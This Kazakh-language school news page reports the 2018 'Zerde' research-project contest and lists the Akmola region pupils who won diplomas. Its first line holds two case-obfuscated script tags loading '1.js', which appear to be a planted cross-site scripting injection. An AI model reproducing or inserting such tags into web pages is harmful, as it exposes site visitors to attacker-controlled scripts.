<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.02.2018

2018  жылдың 29 мен 31 қаңтар  күндері аралығында  1-7 сынып оқушыларының зерттеу жұмыстары мен

шығармашылық жобаларының «Зерде»  республикалық конкурсы «Балдәурен» оқу-сауықтыру орталығының базасында өтті.

Конкурстың мақсаты – бастауыш және орта буынды оқушылардың интеллектуалдық-шығармашылық әлеуетін және танымдық қызығушылықтарын ынталандыру болып табылады.

Оқушыларының зерттеу жұмыстары төмендегі 8 секциялар бойынша өткізілді:

1 секция - қазақ тілі мен әдебиеті;

2 секция - орыс тілі мен әдебиеті;

3 секция - математика, информатика;

4 секция - физика, техника;

5 секция - медицина, психология;

6 секция - химия, биология;

7 секция - тарих, өлкетану, этномәдениеттану;

8 секция - экология, валеология.

Зерттеу жобаларын қорғау жас ерекшеліктері бойынша екі топқа бөлінді 1-4 және 5-7 сыныптар арасында.

Ақмола облысы бойынша 16 жоба –19  оқушы қатысып, оқушылардың жұмыстары тыңдалып, бағаланды. Қазылар  алқасының шешімі бойынша барлық  оқушылар  жүлделі орындарға ие болды.

 І дәрежелі дипломмен 7 оқушы:

1. Жұмабек Диар  - Көкшетау қаласы, №21 орта мектеп-лицейінің  3 сынып оқушысы;

2. Пархоменко Даниил - Бурабай ауданы,  № 3 орта мектебінің   4 сынып оқушысы;

3. Есжан Мансұр, Бекмағанбет Аяулым - Зеренді ауданы,  №1 орта мектебінің  6 сынып оқушылары;

4. Калиев Тамерлан - Бұланды ауданы,  Вознесенск орта мектебінің 3 сынып оқушысы;

5. Сулейменова Айина - Көкшетау қаласы,  №17 орта мектеп-гимназиясының 3 сынып оқушысы;

6. Васильченко Андрей - Көкшетау қаласы,  №5 "Тандау" көпсалалы мектеп-гимназиясының 5 сынып оқушысы марапатталды. 

  ІІ дәрежелі дипломмен 7 оқушы:

1. Утильбекова Акбаян - Көкшетау қаласы, №16 орта мектебінің 3 сынып оқушысы; 

2. Рахимов Шернияз  - Щучинск қаласы  №9 мектеп – гимназиясының 4 сынып оқушысы;

3. Қаппасова Асылтас - Бұланды ауданы,  Макинск қаласының мектеп-лицейінің  7 сынып оқушысы;

4. Кокушев Науан - Көкшетау қаласы,  дарынды балаларға арналған № 3 облыстық мамандандырылған мектеп-интернатының 6 сынып оқушысы;

5. Баймакова Арайлым,Нурланова Инабат - Көкшетау қаласы, М.Ғабдуллин атындағы №3 көптілде оқытатын кәсіби мектеп-гимназиясының 6 сынып оқушылары;

6. Байгабулова  Айдана - Бурабай ауданы,  Ұрымқай орта мектебінің 7 сынып оқушысы марапатталды.

    ІІІ дәрежелі дипломмен 5 оқушы:

1. Баранникова Юлия  - Көкшетау қаласы, №17 орта мектеп-гимназиясының 2  сынып оқушысы;

2. Збасова Карина , Веремей Амир - Бурабай ауданы, Наурызбай батыр атындағы орта мектебінің  5 сынып оқушылары;

3. Даулбаев Асанали  - дарынды балаларға арналған № 3 облыстық мамандандырылған мектеп-интернатының  6 сынып оқушысы;

4. Гринюкова Ксения - Атбасар ауданы, Мариновка орта мектебінің 7  сынып оқушысы марапатталды.

Просмотров: 593


Пікір қосу



Деректерді қолтаңбаға қосу